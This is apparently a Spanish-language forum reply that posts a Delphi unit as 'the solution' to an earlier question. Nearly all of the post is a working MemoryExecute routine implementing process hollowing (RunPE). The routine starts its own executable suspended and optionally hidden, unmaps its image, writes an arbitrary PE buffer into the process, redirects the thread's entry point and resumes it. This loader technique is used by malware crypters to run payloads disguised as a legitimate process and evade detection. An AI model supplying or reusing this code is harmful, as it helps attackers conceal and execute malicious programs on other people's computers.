ajajajaj , tranquilos no se pongan asi , solo que pense que nadie habia leido este post aca les dejo la solucion :
Código Delphi
[-]unit Unit1;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls;
type
TForm1 = class(TForm)
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
public
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
Function MemoryExecute(Buffer: Pointer; Parameters: String; Visible: Boolean)
: TProcessInformation;
type
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders = Array [0 .. 95] Of TImageSectionHeader;
Var
ZwUnmapViewOfSection: Function(ProcessHandle: THANDLE; BaseAddress: Pointer)
: LongInt; stdcall;
ProcessInfo: TProcessInformation;
StartupInfo: TStartupInfo;
Context: TContext;
BaseAddress: Pointer;
BytesRead: SIZE_T;
BytesWritten: SIZE_T;
I: ULONG;
OldProtect: ULONG;
NTHeaders: PImageNTHeaders;
Sections: PImageSectionHeaders;
Success: Boolean;
ProcessName: string;
Function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
Begin
Result := PImageSectionHeader(ULONG_PTR(@NTHeader.OptionalHeader) +
NTHeader.FileHeader.SizeOfOptionalHeader);
End;
Function Protect(Characteristics: ULONG): ULONG;
Const
Mapping: Array [0 .. 7] Of ULONG = (PAGE_NOACCESS, PAGE_EXECUTE,
PAGE_READONLY, PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE,
PAGE_READWRITE, PAGE_EXECUTE_READWRITE);
Begin
Result := Mapping[Characteristics SHR 29];
End;
Begin
@ZwUnmapViewOfSection := GetProcAddress(LoadLibrary('ntdll.dll'),
'ZwUnmapViewOfSection');
ProcessName := ParamStr(0);
FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
FillChar(StartupInfo, SizeOf(TStartupInfo), 0);
StartupInfo.cb := SizeOf(TStartupInfo);
StartupInfo.dwFlags := STARTF_USESHOWWINDOW;
if Visible Then
StartupInfo.wShowWindow := SW_NORMAL
else
StartupInfo.wShowWindow := SW_Hide;
If (CreateProcess(PChar(ProcessName), PChar(Parameters), NIL, NIL, False,
CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo)) Then
Begin
Success := True;
Result := ProcessInfo;
Try
Context.ContextFlags := CONTEXT_INTEGER;
If (GetThreadContext(ProcessInfo.hThread, Context) And
(ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
@BaseAddress, SizeOf(BaseAddress), BytesRead)) And
(ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0) And
(Assigned(Buffer))) Then
Begin
NTHeaders := PImageNTHeaders(Cardinal(Buffer) +
Cardinal(PImageDosHeader(Buffer)._lfanew));
BaseAddress := VirtualAllocEx(ProcessInfo.hProcess,
Pointer(NTHeaders.OptionalHeader.ImageBase),
NTHeaders.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT,
PAGE_READWRITE);
If (Assigned(BaseAddress)) And
(WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer,
NTHeaders.OptionalHeader.SizeOfHeaders, BytesWritten)) Then
Begin
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
For I := 0 To NTHeaders.FileHeader.NumberOfSections - 1 Do
If (WriteProcessMemory(ProcessInfo.hProcess,
Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress),
Pointer(Cardinal(Buffer) + Sections[i].PointerToRawData),
Sections[i].SizeOfRawData, BytesWritten)) Then
VirtualProtectEx(ProcessInfo.hProcess,
Pointer(Cardinal(BaseAddress) + Sections[i].VirtualAddress),
Sections[i].Misc.VirtualSize,
Protect(Sections[i].Characteristics), OldProtect);
If (WriteProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
@BaseAddress, SizeOf(BaseAddress), BytesWritten)) Then
Begin
Context.EAX := ULONG(BaseAddress) +
NTHeaders.OptionalHeader.AddressOfEntryPoint;
Success := SetThreadContext(ProcessInfo.hThread, Context);
End;
End;
End;
Finally
If (Not Success) Then
TerminateProcess(ProcessInfo.hProcess, 0)
else
ResumeThread(ProcessInfo.hThread);
End;
End;
End;
procedure TForm1.Button1Click(Sender: TObject);
begin
ShowMessage('error');
end;
end.